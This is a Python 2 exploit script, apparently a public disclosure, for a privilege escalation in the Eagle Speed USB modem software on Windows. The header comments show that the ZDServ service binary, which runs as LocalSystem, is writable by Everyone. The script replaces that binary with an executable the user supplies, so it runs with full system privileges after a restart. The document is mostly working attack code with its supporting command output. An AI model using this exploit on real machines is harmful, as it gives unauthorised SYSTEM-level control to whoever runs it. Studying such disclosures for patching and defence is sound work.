#!/usr/bin/python -w # Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation # Date : 28/11/2016 # Author : R-73eN # Tested on : Windows 7 ( Latest version of the software) # Software : N/A ( Comes with the USB Modem) # Vulnerability Description: # When the Eagle Speed software is installed a service with name ZDServ is installed. # The service itself has the right permissions which do not allow to reconfigure the binary # but the path the binary is writable by any authenticated user. # # C:\Users\lowpriv>sc qc zdserv # [SC] QueryServiceConfig SUCCESS # # SERVICE_NAME: zdserv # TYPE : 110 WIN32_OWN_PROCESS (interactive) # START_TYPE : 2 AUTO_START # ERROR_CONTROL : 1 NORMAL # BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" # LOAD_ORDER_GROUP : # TAG : 0 # DISPLAY_NAME : ZDServ # DEPENDENCIES : # SERVICE_START_NAME : LocalSystem # # # # C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" # C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions. # NT AUTHORITY\SYSTEM:(I)(F) # BUILTIN\Administrators:(I)(F) # Victim-PC\lowpriv:(I)(F) # BUILTIN\Users:(I)(RX) # # Successfully processed 1 files; Failed processing 0 files # # This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run # with full privileges when the service/computer is restarted. # # Video : https://youtu.be/o59SD8gXzlU #
import os import sys import filecmp path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"' banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner
if(len(sys.argv) < 2): print '\n Usage : exploit.py program.exe\n' print 'https://infogen.al/' else: program = sys.argv[1] if(not os.path.isfile(program)): print "[-] The parameter was incorrect, use a correct filename [-]" exit(0) if(not os.path.isfile(path)): print "[-] File not found , propably service doesn't exists [-]\n" else: print "[+] Backing up the binary [+]" os.system(file_move) print "[+] Copying the payload [+]" os.system("copy " + program + " " + path) if(filecmp.cmp(program,path)): print "[+] Exploit successfull, wait for service to restart or reboot [+]" else: print "[-] Exploit failed [-]"
|